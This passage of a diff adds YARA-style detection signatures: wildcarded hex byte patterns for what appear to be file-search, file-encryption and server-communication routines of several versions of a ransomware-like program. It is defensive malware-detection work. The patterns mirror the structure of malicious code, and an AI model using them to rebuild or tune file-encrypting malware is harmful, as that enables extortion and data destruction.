+            94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
+            0F 84 AF 01 00 00 8D 8C 24 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 92 01 00 00 8D 94 24 ?? ??
+            ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 75 01 00 00 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8
+        }
+		$file_search_0_3_4a_2 = {
+            83 C4 ?? 85 C0 0F 84 58 01 00 00 8D 8C 24 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 3B 01
+            00 00 8D 94 24 ?? ?? ?? ?? 57 52 E8 10 FE FF FF 8D 84 24 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? E9 E7 00 00 00 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 52 E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 FF 74 79 8D 54
+            24 ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 7F 00 00 00 8D 44 24 ?? 50 E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 63 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 75 47 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 35 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB 23 8D
+            4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 10 8D 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24
+            ?? 50 55 FF D3 85 C0 74 0D 83 3D ?? ?? ?? ?? ?? 0F 84 7D FD FF FF 55 FF 15 ?? ?? ?? ?? 5B 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D
+            33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$file_search_0_3_5a_1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 8B AC 24 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 8D
+            84 24 ?? ?? ?? ?? 6A ?? 50 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A
+            ?? 51 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 55 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83
+            C4 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ??
+            52 FF 15 ?? ?? ?? ?? 83 F8 ?? 89 44 24 ?? 0F 84 91 03 00 00 8B 9C 24 ?? ?? ?? ?? F6 44 24 ?? ?? 0F 84 73 02 00 00 8D 4C
+            24 ?? B8 ?? ?? ?? ?? 90 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2
+            75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 23 03 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 8D 64 24 ?? 66 8B 10 66 3B 11 75 1E
+            66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 E3
+            02 00 00 55 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B C5 83 C4 ?? 8D 50 ?? 8B FF 66 8B 08 83 C0 ?? 66 85
+            C9 75 F5 2B C2 D1 F8 83 F8 ?? 76 1A 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54
+            24 ?? 52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66
+            3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85
+            C0 0F 84 3F 02 00 00 8D 8C 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ??
+            75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 00 02 00 00 8D 8C 24 ?? ?? ?? ?? B8
+        }
+		$file_search_0_3_5a_2 = {
+            66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05
+            1B C0 83 D8 ?? 85 C0 0F 84 C1 01 00 00 8D 8C 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B
+            50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 82 01 00 00 8D 8C 24 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2
+            75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 43 01 00 00 8D 8C 24 ?? ?? ?? ?? 53 51 E8 0F FD FF FF 8D 94 24 ?? ?? ?? ??
+            52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ED 00 00 00 55 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8
+            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94
+            24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 DB 8D 44 24 ?? 0F 84 79 00 00 00 50 E8 ?? ?? ?? ?? 83 C4 ??
+            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 78 00 00 00 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 59 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            85 C0 75 3A 8D 7C 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 2C 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB 1E 68 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 74 0C 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? 8D 4C 24 ?? 51 57 FF 15 ?? ?? ?? ?? 85 C0
+            0F 85 7D FC FF FF 57 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5D 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$encrypt_file_0_2_6a_1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 33 C0 56 8B B4 24 ?? ?? ?? ?? 57 33 FF 68 ?? ??
+            ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 88 84
+            24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ??
+            ?? 8D 84 24 ?? ?? ?? ?? 57 50 89 74 24 ?? C6 84 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 66 89 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
+            ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52
+            E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 1A 57 56
+            FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 89 7C 24 ?? 75 21 56 FF 15 ?? ?? ?? ?? 5F 83 C8 ?? 5E 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ??
+            ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 81 FF ?? ?? ?? ?? 77 D7 53 55 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 94 24 ?? ??
+            ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 8B D7 83 E2 ?? BB ?? ?? ?? ?? 2B DA 89 8C 24
+        }
+		$encrypt_file_0_2_6a_2 = {
+            8B 8C 24 ?? ?? ?? ?? 03 FB 57 89 84 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B E8 83 C4 ?? 85 ED 74 3C
+            8B 4C 24 ?? 6A ?? 8D 44 24 ?? 50 51 55 56 FF 15 ?? ?? ?? ?? 85 C0 74 24 8B 44 24 ?? 3B 44 24 ?? 75 1A 53 8D 14 28 53 52
+            E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 75 0F 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 D5 00 00 00 8D 44 24 ?? 50
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 52 57 53 55 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ??
+            56 FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 54 24 ?? 52 6A ??
+            8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 51 57 53 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 74 24 ?? 8D
+            94 24 ?? ?? ?? ?? 52 56 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 C0 74 0F 56 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 05
+            ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 55 11 05 ?? ?? ?? ?? 01 3D ?? ?? ?? ?? 11 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ??
+            83 C4 ?? B8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5D 5B 5F 5E 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$encrypt_file_0_3_1 = {
+            53 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 94 24
+            ?? ?? ?? ?? 8B D5 83 E2 ?? BF ?? ?? ?? ?? 2B FA 89 8C 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8D 1C 2F 53 89 84 24 ?? ?? ??
+            ?? 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 89 44 24 ?? 74 38 6A ?? 8D 4C 24 ?? 51 55 50 56 FF 15 ?? ?? ?? ??
+            85 C0 74 24 3B 6C 24 ?? 75 1E 57 57 8B 7C 24 ?? 8D 14 2F 52 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B E8 83 C4 ?? 85 ED 75 0F
+            56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 0F 01 00 00 8D 44 24 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 24 ?? ??
+            ?? ?? 52 53 55 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50
+            6A ?? 8D 8C 24 ?? ?? ?? ?? 51 56 FF D7 6A ?? 8D 54 24 ?? 52 6A ?? 8D 44 24 ?? 50 56 FF D7 6A ?? 8D 4C 24 ?? 51 53 55 56
+            FF D7 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 33 F6 8D 9B ?? ?? ?? ?? 8B 44 24 ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 52 50 FF 15
+            ?? ?? ?? ?? 85 C0 75 27 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 0E 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A ?? FF D7 83
+            C6 ?? 83 FE ?? 7C C0 A1 ?? ?? ?? ?? 33 F6 3B C6 74 13 8B 54 24 ?? 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 05 ??
+            ?? ?? ?? ?? 8B 44 24 ?? 50 11 35 ?? ?? ?? ?? 01 1D ?? ?? ?? ?? 11 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 83 C4
+            ?? B8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5B 5D 5F 5E 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$encrypt_file_0_3_3_1 = {
+            55 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 89 94 24
+            ?? ?? ?? ?? 8B D3 83 E2 ?? BD ?? ?? ?? ?? 2B EA 89 84 24 ?? ?? ?? ?? 8D 04 2B 89 8C 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ??
+            50 89 8C 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 0A 01 00 00 6A ?? 8D 44 24 ?? 50 53 57 56
+            FF 15 ?? ?? ?? ?? 85 C0 75 18 56 FF 15 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 C8 ?? E9 98 01 00 00 3B 5C 24 ?? 75 1E
+            55 8D 0C 1F 55 51 E8 ?? ?? ?? ?? 8B 6C 24 ?? 55 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 75 18 57 E8 ?? ?? ?? ?? 83 C4 ?? 56
+            FF 15 ?? ?? ?? ?? 83 C8 ?? E9 5C 01 00 00 8D 54 24 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ??
+            ?? 51 55 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 6A ?? 8D 54 24 ?? 52 6A
+            ?? 8D 84 24 ?? ?? ?? ?? 50 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 39 6A ?? 8D 4C 24 ?? 51 6A ?? 8D 54 24 ?? 52 56 C7
+            44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 1C 8B 4C 24 ?? 6A ?? 8D 44 24 ?? 50 51 53 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 75
+            1E 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 AB 00 00 00 56 FF 15 ?? ?? ?? ?? 56 FF
+        }
+		$encrypt_file_0_3_3_2 = {
+            15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 33 F6 8D 49 ?? 8B 44 24 ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? 85 C0 75
+            2A FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 0E 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D5 83 C6 ?? 83 FE
+            ?? 7C BD A1 ?? ?? ?? ?? 33 F6 3B C6 74 13 8B 54 24 ?? 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 05 ?? ?? ?? ?? ??
+            8B 44 24 ?? 57 11 35 ?? ?? ?? ?? 01 05 ?? ?? ?? ?? 11 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ??
+            ?? ?? 8B 8C 24 ?? ?? ?? ?? 5D 5B 5F 5E 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$encrypt_file_0_3_4a_1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 33 C0 56 8B B4 24 ?? ?? ?? ?? 57 33 FF 68 ?? ??
+            ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 88 84
+            24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ??
+            ?? 8D 84 24 ?? ?? ?? ?? 57 50 89 74 24 ?? C6 84 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 66 89 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
+            ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52
+            E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? 57 57 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 19 5F 0B C0
+            5E 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 53 57 56 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 74 08 81 FB
+            ?? ?? ?? ?? 76 22 56 FF 15 ?? ?? ?? ?? 5B 5F 83 C8 ?? 5E 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+            55 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 8D 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8B
+            C3 83 E0 ?? BD ?? ?? ?? ?? 2B E8 8D 04 2B 50 89 44 24 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 0A 01 00 00 6A ?? 8D
+            4C 24 ?? 51 53 57 56 FF 15 ?? ?? ?? ?? 85 C0 75 18 56 FF 15 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 C8 ?? E9 99 01 00
+        }
+		$encrypt_file_0_3_4a_2 = {
+            00 3B 5C 24 ?? 75 1E 55 8D 14 1F 55 52 E8 ?? ?? ?? ?? 8B 6C 24 ?? 55 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 75 18 57 E8 ??
+            ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 5D 01 00 00 8D 44 24 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ??
+            51 8D 94 24 ?? ?? ?? ?? 52 55 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 6A
+            ?? 8D 44 24 ?? 50 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 39 6A ?? 8D 54 24 ?? 52 6A ??
+            8D 44 24 ?? 50 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 1C 8B 54 24 ?? 6A ?? 8D 4C 24 ?? 51 52 53 56 C7 44 24 ?? ?? ??
+            ?? ?? FF D5 85 C0 75 1E 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 AC 00 00 00 56 FF
+            15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 33 F6 8D 64 24 ?? 8B 4C 24 ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 50 51 FF
+            15 ?? ?? ?? ?? 85 C0 75 2A FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 0E 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? FF D5 83 C6 ?? 83 FE ?? 7C BD A1 ?? ?? ?? ?? 33 F6 3B C6 74 13 8B 4C 24 ?? 51 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 83 05 ?? ?? ?? ?? ?? 8B 54 24 ?? 57 11 35 ?? ?? ?? ?? 01 15 ?? ?? ?? ?? 11 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 E8 ?? ??
+            ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5D 5B 5F 5E 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$encrypt_file_0_3_5a_1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 33 C0 55 56 57 33 FF 68 ?? ?? ?? ?? 89 84 24
+            ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ??
+            89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 8D 84 24 ??
+            ?? ?? ?? 8B F1 57 50 89 74 24 ?? C6 84 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 66 89 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A
+            ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52
+            E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? 57 57 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 0F 84 D2 00 00
+            00 57 56 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 B8 00 00 00 3B EF 0F 84 B0 00 00 00 81 FD ?? ?? ?? ?? 0F 87 A4 00 00 00
+            8D 4F ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 89 8C 24 ??
+            ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B CD 83 E1 ?? BB ?? ?? ?? ?? 2B D9 89 84 24 ?? ?? ?? ?? 8D 04 2B 50
+            89 94 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 3B 6A ?? 8D 54 24 ?? 52 55 57 56 FF 15 ?? ?? ??
+            ?? 85 C0 75 18 56 FF 15 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 C8 ?? E9 98 01 00 00 3B 6C 24 ?? 74 18 57 E8
+        }
+		$encrypt_file_0_3_5a_2 = {
+            83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? E9 7A 01 00 00 53 8D 04 2F 53 50 E8 ?? ?? ?? ?? 8B 6C 24 ?? 83 C4 ?? 55 E8 ??
+            ?? ?? ?? 8B D8 83 C4 ?? 85 DB 74 C7 8D 4C 24 ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 54 24 ?? 52 8D 84 24 ?? ?? ?? ?? 50
+            55 57 8B CB E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 51 6A ??
+            8D 94 24 ?? ?? ?? ?? 52 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 75 0F 57 E8 ?? ?? ?? ?? 83 C4 ?? 53 E9 5E FF FF FF 6A ??
+            8D 44 24 ?? 50 6A ?? 8D 4C 24 ?? 51 56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 D4 8B 44 24 ?? 6A ?? 8D 54 24 ?? 52 50 53
+            56 C7 44 24 ?? ?? ?? ?? ?? FF D5 85 C0 74 B8 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 33 F6 EB 09 8D
+            A4 24 ?? ?? ?? ?? 8B FF 8B 54 24 ?? 6A ?? 8D 8C 24 ?? ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 75 2A FF 15 ?? ?? ?? ?? 3D
+            ?? ?? ?? ?? 75 0E 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D5 83 C6 ?? 83 FE ?? 7C BD A1 ?? ?? ?? ??
+            33 F6 3B C6 74 13 8B 4C 24 ?? 51 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 05 ?? ?? ?? ?? ?? 8B 54 24 ?? 57 11 35 ??
+            ?? ?? ?? 01 15 ?? ?? ?? ?? 11 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? 8B 8C 24
+            ?? ?? ?? ?? 5F 5E 5D 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$server_communication_0_2_6a_1 = {
